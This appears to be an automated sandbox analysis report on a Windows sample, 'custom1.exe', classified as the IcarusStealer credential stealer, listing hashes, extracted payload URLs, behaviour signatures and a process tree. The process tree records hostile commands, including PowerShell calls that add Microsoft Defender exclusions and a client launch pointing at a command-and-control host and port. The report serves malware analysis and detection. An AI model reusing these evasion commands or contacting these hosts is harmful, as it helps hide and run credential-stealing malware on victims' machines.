Analysis
-
max time kernel
6s -
max time network
12s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
09/03/2024, 05:46
General
-
Target
custom1.exe
-
Size
24.9MB
-
MD5
4e1c29f0c1af62ddea916c6b80548c76
-
SHA1
38d9f15356b6a65f4e76ee739867d55b01493793
-
SHA256
13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882
-
SHA512
f863e54437a36b53f91057f74bdbfcaed90c93256333afe978be5f7b73b417a74084d3a92afe4b6ceea96fd909997cf22b30612c43d6d0d27c64c0bba7db9c28
-
SSDEEP
49152:lfRW10dDWeHzJhNF/CBpOqqUe00zCMe8KfFo:lfw1yaeHLNF/22UwCL8yF
Malware Config
Extracted
icarusstealer
-
payload_url
https://blackhatsec.org/add.jpg
https://blackhatsec.org/remove.jpg
Signatures
-
IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 5 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 60 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\custom1.exe"C:\Users\Admin\AppData\Local\Temp\custom1.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\switched.exe"C:\Users\Admin\AppData\Local\Temp\switched.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\certutil.execertutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD55⤵
-
-
C:\Windows\system32\find.exefind /i /v "md5"5⤵
-
-
C:\Windows\system32\find.exefind /i /v "certutil"5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\tesetey.exe"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hwfcznc2\hwfcznc2.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4846.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF5046938BF61461280E219CD4B377E9C.TMP"5⤵
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"4⤵
- Modifies Installed Components in the registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\ctfmon.exectfmon.exe5⤵
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\Start.exe & exit4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Start.exeC:\Users\Admin\AppData\Local\Temp\Start.exe5⤵
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.5MB
MD5ff219c8c219807ee57e76c79a1c41d07
SHA19c61f0def535267fbdc388c0dd198fb19ccf07b8
SHA2566916849fca5276d5d9fb61ea504d1fd1c760d31ea7d8f59944623e2570b769ef
SHA512dba3259b17d27814ebf2a598947348276375a560c5137310a6c38da882f47f2d1a2e83ed51491296dcf8bc6d4d9d666331271b01b93fc456002dea6876295b31
-
Filesize
3.8MB
MD533732ed02a4d34c2e2922b76dfa7c23d
SHA1a615d466c06c7894b4c2c11111b174a780870fa3
SHA2561567983142e9d7e761e444acb7607d434fd39889e586101f88be4a68d7100498
SHA5122dbac37991dfb8e7d0aa9f5316fc724ac59996fb994f5f035e2a316eef5bbdb31245d17be0c3d9237b9727f88fae994fef73d3a72e2d512e177a8d35c600883d
-
Filesize
1KB
MD5108813d4d95b23ff428e36f7842c108f
SHA128b02fcbd3ad04f2bffd68730145d95ae73fae3c
SHA256fd009b184fa1e596b036e2e282f13ae634a7f05c71e82ebfc654f7af1ced30bf
SHA5124f4e24eaec8b9978fa25280ef1346631c6b08b44fb3e77ddb0d1fbc8f6e1b95c1849433eb14ee8230fcc8b033b492feaa9d5fdd5f47fdbf33c6fd0f0eb49a91e
-
Filesize
4KB
MD5a599003d7babea10acb2ab86aa6b90e0
SHA1057c92c1d8efa27e3ae42cd7c63c740e59e8372b
SHA2566e233bc767d9ccbcb709962438d86d01092738877848ddca19feca74dd55a389
SHA5120a3401ae0f282537a9024f5ca35ee99fa95a07b1eadcb79b7fdbc9b4403baa9f1dda3787a5264058e1e312af89e758a9fa4b9a014ca8875f596364c70f0cae13
-
Filesize
1.5MB
MD56aaa2ef583feb7c5c15353cb5bfda6b9
SHA1f6a4124bae93217ff03feb5a3ffc2deb6eb0a7e9
SHA256a2cc60512fce35bf126173d566507bae472539906c33a003f02895b7725682f2
SHA5121e557174da97c52b85848fd11bdd7677257f55915d48cc33b6b57bff3b588332317231d7f84ecaff7ca40db7feaccaf23e94fe6d41c75e1a7b6832d344b8708b
-
Filesize
2.2MB
MD5e9f1d5e4e4e2569d6f8af2a3bc66e5da
SHA152779ad0002208eefee98a0c3540bca3a9f1d52f
SHA256052c422833a7e87163a8e2a0050ab024ee3191eab116d15ff722e7275acbfe75
SHA512fc81c90c0a8189c75fbac20b33cdaf78d8cb6e635d64ef3c9380b164377ffc844acb43794d37395184319c1d70a4c8c57f8bc8b16d321db067e659ba6662d272
-
Filesize
3.7MB
MD5b9bbe31d276de5c3d05352d070ae4244
SHA15e1bb67b01c579b4e0ad5a7475ceb657201c27ec
SHA256a01977e758a85dc01fb8ca7da9110adfe5bf9b9bec0af1db82741fe83d20408d
SHA5120a3459690bfdf8d238cb6f27c650903659c12aa589bcba037a45c68287342f53ca5c1e1b307a0abd8d481f79e3df6bd994cce6a79258343627aa7b3209b0ed17
-
Filesize
494KB
MD50f0838bc6642dd6bc603368e50b4aba3
SHA1932bd4d1c11996bf8ac3ac74a94b266e96d44c36
SHA2564acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9
SHA512a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860
-
Filesize
7KB
MD54f6f6ff03f52bd381d1713ff4d35a16d
SHA1f599a0b9894b2deb6b24f136678ebbeed6998a80
SHA256d5d25a88ae7e189c2c30438d0ff3eaee6a1e3650a9927abb909bb7becd6e156a
SHA5129fcc9c9437d715ae600bea03fbd7e51245c0a2d9cd0e7df2b6406060071d481ac923290d6a14d67693243597d28b80e301dd865fab87615a3c3223d05de17db6
-
Filesize
1KB
MD5810535a8ae563d6aa53635a1bb1206ff
SHA1f5ba39f1a455eb61efe5022b524892249ee75dce
SHA2567f2c2a29a5f1c0d994fa4c2fccc11a8f3f5f5d4d97ada18aea94971664c8992f
SHA5125662b39b29d33bff2e8de4cf3878a6e58b7a163cc93311f4c82f03e73b239a76bb9064ed0c4a6d01cceb858663462345cae78999cfa3668ef975cf85dfff138d
-
Filesize
1KB
MD514846c9faaef9299a1bf17730f20e4e6
SHA18083da995cfaa0e8e469780e32fcff1747850eb6
SHA25661bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b
SHA512549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1
-
Filesize
447B
MD573464ad5ce5d83dd66ab507de09ee137
SHA1cf902f2d11b93008c10a63f04d5ad854d50db15b
SHA256544f1146819cce0a68b6445b2a3a9c2877a294f9d318e186f47d4968d4825ccb
SHA5121247a4c3ec2c68b7a49389ca0c170d3f1deac496abbbfe3eadd0a11529b5d3f6b53c76265fdb90a87bfd8f1dbb66318a32e2f6bfd7b0263974fbc769aee42c60
-
Filesize
5.9MB
MD5c97e31cd3728516fe68c93ffc4a11d78
SHA1248aa9330b5508d433ce98ff6ddb250bdd1f069d
SHA256f0fec07e7b06e4f817330155b371d8b10bd5fae8dd6f143ef295cc30f56efac5
SHA512db47718ed9592effc65f1a0a5ba50f07cb1f0257941733c7dd9b8d4921d18cb16c70554e9c4fba50eff1a7b3d6a5fc96ebc82df6c41fd2ff784a7268506bd725
-
Filesize
1.6MB
MD53e359df762ce2cca4fa21b0aa438b532
SHA1cd3a11ed9cfb6c4a1f6b29ffb4d4855372c5378e
SHA256c72a672ead28482da2e06879b26a6a018a054f0e52f9b015adac64380d6e30c5
SHA512a636c71adb2865d4f62fecd9942f8792a22dc623930f6d1db742be48607d44a30ff445f92708a026cc7820f93d4abd6f65dc5187c17a3ac39c9909ba050e8364
-
Filesize
32KB
-
Filesize
9.9MB
-
Filesize
512KB
-
Filesize
6.9MB
-
Filesize
256KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
4KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
6.9MB
-
Filesize
256KB
-
Filesize
6.9MB
-
Filesize
520KB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
4.2MB
-
Filesize
4.2MB
-
Filesize
256KB
-
Filesize
6.9MB
-
Filesize
6.2MB